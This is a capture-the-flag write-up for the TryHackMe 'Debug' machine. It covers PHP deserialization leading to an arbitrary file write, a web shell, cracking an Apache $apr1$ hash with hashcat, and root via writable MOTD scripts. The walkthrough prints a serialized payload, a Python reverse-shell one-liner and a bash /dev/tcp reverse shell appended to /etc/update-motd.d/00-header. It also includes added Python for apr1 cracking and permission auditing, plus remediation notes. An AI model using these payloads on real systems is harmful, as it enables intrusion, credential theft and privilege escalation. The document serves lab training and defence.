
Debug (PHP Deserialization, motd)

First, we enumerate the target with nmap. Only SSH (22) and HTTP (80) are open.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  cat nmap.log 
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-25 14:01 +0630
Nmap scan report for 10.10.75.117
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
|   256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_  256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp    open     http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1038/tcp  filtered mtqp
1095/tcp  filtered nicelink
1165/tcp  filtered qsm-gui
5811/tcp  filtered unknown
7920/tcp  filtered unknown
9575/tcp  filtered unknown
27356/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 587.40 seconds

Port 80

The HTTP port serves the default Apache page at http://10.10.75.117/, so let's brute-force directories and common extensions with gobuster.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  gobuster -u http://10.10.75.117/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh

/javascript (Status: 301)
/backup (Status: 301)
/grid (Status: 301)

In the http://10.10.75.117/backup directory there is index.php.bak, a backup of the site's index.php. Here is the vulnerable source.

<?php

class FormSubmit {

    public $form_file = 'message.txt';
    public $message = '';

    public function SaveMessage() {

        $NameArea = $_GET['name'];
        $EmailArea = $_GET['email'];
        $TextArea = $_GET['comments'];

        $this->message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";

    }

    public function __destruct() {

        file_put_contents(__DIR__ . '/' . $this->form_file, $this->message, FILE_APPEND);
        echo 'Your submission has been successfully saved!';

    }

}

// Leaving this for now... only for debug purposes... do not touch!

$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);

$application = new FormSubmit;
$application->SaveMessage();

?>

The bug is the debug line: unserialize() rebuilds whatever object we describe in the debug parameter, and nothing restricts the class. When the script finishes, that object's __destruct() calls file_put_contents() with our form_file as the filename and our message as the content, appended under __DIR__ (the web root). That is an arbitrary file write inside the document root, so we can drop a PHP file of our choosing. (The fix is not to unserialize user input at all; json_decode(), or unserialize() with allowed_classes => false, removes the gadget.) We create exploit.php based on index.php.bak to produce the serialized object:

<?php

class FormSubmit {

	public $form_file = 'shell.php';
	public $message = '<?php system("whoami"); ?>';

}

echo urlencode(serialize(new FormSubmit));
?>

Run it; the script prints the serialized object already passed through urlencode(), so it can go straight into the query string.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  php -q exploit.php
O%3A10%3A%22FormSubmit%22%3A2%3A%7Bs%3A9%3A%22form_file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A7%3A%22message%22%3Bs%3A26%3A%22%3C%3Fphp+system%28%22whoami%22%29%3B+%3F%3E%22%3B%7D

The complete URL is http://10.10.75.117/index.php?debug=O%3A10%3A%22FormSubmit%22%3A2%3A%7Bs%3A9%3A%22form_file%22%3Bs%3A9%3A%22shell.php%22%3Bs%3A7%3A%22message%22%3Bs%3A26%3A%22%3C%3Fphp+system%28%22whoami%22%29%3B+%3F%3E%22%3B%7D. Requesting it triggers the write (every request appends again because of FILE_APPEND), and the output of whoami is then visible at http://10.10.75.117/shell.php.

Next, make the dropped file a proper web shell that runs whatever is passed in the cmd parameter; the same exploit.php with a different message does it.

<?php

class FormSubmit {

	public $form_file = 'shell.php';
	public $message = '<?php system($_GET["cmd"]); ?>';

}

echo urlencode(serialize(new FormSubmit));
?>

Start a netcat listener first, then call the web shell with the Python reverse shell one-liner as cmd (URL-encode the command when sending it from a browser or curl, otherwise the quotes, semicolons and spaces are mangled): http://10.10.75.117/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.63",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'. The listener catches the reverse shell.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.75.117 55028
$ 

User

On the box there is an .htpasswd file with a password hash for the james user.

$ cat .htpasswd
cat .htpasswd
james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1

The $apr1$ prefix is Apache's MD5-based htpasswd format, which is hashcat mode 1600. Let's crack it with hashcat and rockyou.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz, 2048/5579 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=1600 -D _unroll'
* Device #1: Kernel m01600-pure.207adefd.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1:jamaica    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1
Time.Started.....: Mon Apr 25 19:59:35 2022 (1 sec)
Time.Estimated...: Mon Apr 25 19:59:36 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1041 H/s (8.05ms) @ Accel:256 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1024/14344384 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: 123456 -> bethany

Started: Mon Apr 25 19:59:10 2022
Stopped: Mon Apr 25 19:59:37 2022
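As an added example (not part of the original writeup), the following Python re-implements the $apr1$ algorithm that hashcat mode 1600 attacks: MD5 with an 8-character salt, 1000 stretching rounds and a custom base64 alphabet, exactly as Apache's apr_md5_encode() does it. It lets you confirm a cracked password offline without re-running hashcat, and the crack() loop shows what the dictionary attack actually does. The hash line is the one from .htpasswd above; the four-word candidate list is constructed to stand in for rockyou.txt.

```python
"""Verify a cracked Apache htpasswd $apr1$ entry offline.

Added example for this writeup, not part of the original page. Implements the
apr1 (MD5-based, 1000-round) scheme that hashcat mode 1600 attacks, so a
recovered password can be confirmed without hashcat.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value: int, n: int) -> str:
    """crypt(3)-style base64: n characters, least significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password: str, salt: str) -> str:
    """Compute $apr1$<salt>$<22 chars> as Apache's apr_md5_encode() does."""
    pw = password.encode("utf-8")
    sl = salt[:8].encode("ascii")          # salt is at most 8 characters
    ctx = hashlib.md5(pw + MAGIC + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    pl = len(pw)
    while pl > 0:                          # mix in `alt`, one byte per password byte
        ctx.update(alt[: min(pl, 16)])
        pl -= 16
    i = len(pw)
    while i:                               # for each bit of len(pw): a NUL or pw[0]
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                  # the stretching loop
        h = hashlib.md5()
        h.update(pw if i & 1 else final)
        if i % 3:
            h.update(sl)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()
    f = final
    encoded = (                            # bytes are interleaved before encoding
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return "$apr1$" + sl.decode("ascii") + "$" + encoded


def apr1_verify(entry: str, password: str) -> bool:
    """`entry` is the hash field of an .htpasswd line, e.g. '$apr1$zPZMix2A$d8fB...'."""
    parts = entry.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_hash(password, parts[2]), entry)


def crack(entry: str, candidates):
    """Dictionary attack: first candidate whose apr1 hash matches, or None.
    One MD5-based hash with 1000 rounds per candidate is why hashcat shows ~1 kH/s
    on a CPU for this mode."""
    salt = entry.split("$")[2]
    for cand in candidates:
        if apr1_hash(cand, salt) == entry:
            return cand
    return None


HTPASSWD_LINE = "james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1"   # from the target's .htpasswd
# Constructed mini-wordlist standing in for rockyou.txt.
CANDIDATES = ["123456", "password", "jamaica", "bethany"]

if __name__ == "__main__":
    user, digest = HTPASSWD_LINE.split(":", 1)
    print(user, "->", crack(digest, CANDIDATES))
```

The same routine with the magic string changed to `$1$` is the classic Unix md5crypt; the two formats differ only in that prefix, which is why hashcat lists them as separate modes (500 and 1600) despite identical cost.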

Let's log in as james over SSH with the password jamaica.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/debug  
╰─➤  ssh james@10.10.75.117
The authenticity of host '10.10.75.117 (10.10.75.117)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.75.117' (ECDSA) to the list of known hosts.
james@10.10.75.117's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ 

Read the user flag.

james@osboxes:~$ cat user.txt 
7e37c84a66cc40b1c6bf700d08d28c20
james@osboxes:~$ 

Root

Here is a note left for the james user.

james@osboxes:~$ cat Note-To-James.txt 
Dear James,

As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it? 

But there's still one thing I'd like you to do, before the submission.

Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D

I gave you access to modify all these files :) 

Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!

Best Regards,

root
james@osboxes:~$ 

The SSH welcome message comes from the scripts in /etc/update-motd.d. List them:

james@osboxes:~$ ls -al /etc/update-motd.d
total 44
drwxr-xr-x   2 root root   4096 Mar 10  2021 .
drwxr-xr-x 134 root root  12288 Mar 10  2021 ..
-rwxrwxr-x   1 root james  1220 Mar 10  2021 00-header
-rwxrwxr-x   1 root james     0 Mar 10  2021 00-header.save
-rwxrwxr-x   1 root james  1157 Jun 14  2016 10-help-text
-rwxrwxr-x   1 root james    97 Dec  7  2018 90-updates-available
-rwxrwxr-x   1 root james   299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x   1 root james   142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x   1 root james   144 Dec  7  2018 98-reboot-required
-rwxrwxr-x   1 root james   604 Nov  5  2017 99-esm

That is the route to root: pam_motd runs every script in this directory as root on each SSH login, and all of them are group-writable by james (mode 775, group james). Appending a command to 00-header therefore executes it as root at the next login.

echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.63/9002 0>&1'" >> /etc/update-motd.d/00-header

Start a listener on port 9002, then log in again over SSH as james. The modified MOTD script runs as root during the login and the listener receives a root shell.

╭─hnl@hnl ~  
╰─➤  nc -nlvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.75.117 42310
bash: cannot set terminal process group (1986): Inappropriate ioctl for device
bash: no job control in this shell
root@osboxes:/# cat /root/root.txt
cat /root/root.txt
3c8c3d0fe758c320d158e32f68fabf4b
root@osboxes:/#
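The privilege escalation rests on one permission check: a file that root executes but a lower-privileged user can write. As an added example (not part of the original writeup), the following Python applies that check to the ls -al listing captured above, using the mode string, owner and group fields, so it runs offline; the same decision function is reused by audit_directory() for a live walk of /etc/update-motd.d with stat(). The listing text is copied from the page; the function names are ours. Run the live check as the unprivileged user whose access you are questioning: only classic Unix bits are modelled, not ACLs or root's override.

```python
"""Find MOTD scripts that a non-root user can modify.

Added example for this writeup, not from the original page. pam_motd runs every
executable in /etc/update-motd.d as root at each SSH login, so a script there
that an unprivileged user can write is a root code-execution path.
"""
import os
import stat
from pathlib import Path
from typing import Optional

# Constructed copy of the writeup's `ls -al /etc/update-motd.d` output.
LISTING = """\
total 44
drwxr-xr-x   2 root root   4096 Mar 10  2021 .
drwxr-xr-x 134 root root  12288 Mar 10  2021 ..
-rwxrwxr-x   1 root james  1220 Mar 10  2021 00-header
-rwxrwxr-x   1 root james     0 Mar 10  2021 00-header.save
-rwxrwxr-x   1 root james  1157 Jun 14  2016 10-help-text
-rwxrwxr-x   1 root james    97 Dec  7  2018 90-updates-available
-rwxrwxr-x   1 root james   299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x   1 root james   142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x   1 root james   144 Dec  7  2018 98-reboot-required
-rwxrwxr-x   1 root james   604 Nov  5  2017 99-esm
"""


def can_write(owner: str, group: str, mode: int, user: str, user_groups) -> Optional[str]:
    """Why `user` (a member of `user_groups`) can write the file, or None.
    Classic Unix bits only: ACLs, capabilities and root's override are not modelled."""
    if user == owner and mode & stat.S_IWUSR:
        return "owner-writable"
    if group in user_groups and mode & stat.S_IWGRP:
        return "group-writable via group %s" % group
    if mode & stat.S_IWOTH:
        return "world-writable"
    return None


def parse_mode(text: str) -> int:
    """'rwxrwxr-x' -> 0o775 (s/S/t/T letters count as the bit being set)."""
    bits = 0
    for ch in text[:9]:
        bits = (bits << 1) | (0 if ch == "-" else 1)
    return bits


def audit_listing(listing: str, user: str, user_groups):
    """Apply can_write() to each `ls -al` line; skips 'total', '.' and '..'."""
    findings = []
    for line in listing.splitlines():
        fields = line.split(None, 8)
        if len(fields) < 9 or fields[0][0] not in "-dl":
            continue
        name = fields[8]
        if name in (".", ".."):
            continue
        reason = can_write(fields[2], fields[3], parse_mode(fields[0][1:]), user, user_groups)
        if reason:
            findings.append((name, reason))
    return findings


def audit_directory(directory="/etc/update-motd.d", user=None, user_groups=None):
    """Same check against a live directory via stat(); defaults to the calling user."""
    import grp
    import pwd
    if user is None:
        user = pwd.getpwuid(os.getuid()).pw_name
    if user_groups is None:
        user_groups = {grp.getgrgid(g).gr_name for g in os.getgroups()}
    findings = []
    for p in sorted(Path(directory).iterdir()):
        st = p.lstat()
        if not stat.S_ISREG(st.st_mode):
            continue
        owner = pwd.getpwuid(st.st_uid).pw_name
        group = grp.getgrgid(st.st_gid).gr_name
        reason = can_write(owner, group, stat.S_IMODE(st.st_mode), user, user_groups)
        if reason:
            findings.append((p.name, reason))
    return findings


if __name__ == "__main__":
    for name, why in audit_listing(LISTING, "james", {"james"}):
        print("%-25s %s" % (name, why))
```

On a stock Ubuntu 16.04 these scripts are root:root with mode 755, which is also the remediation: chown them back to root and remove the group write bit, and the directory itself must not be writable either, since a writable directory lets a user add a new script rather than edit an existing one.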
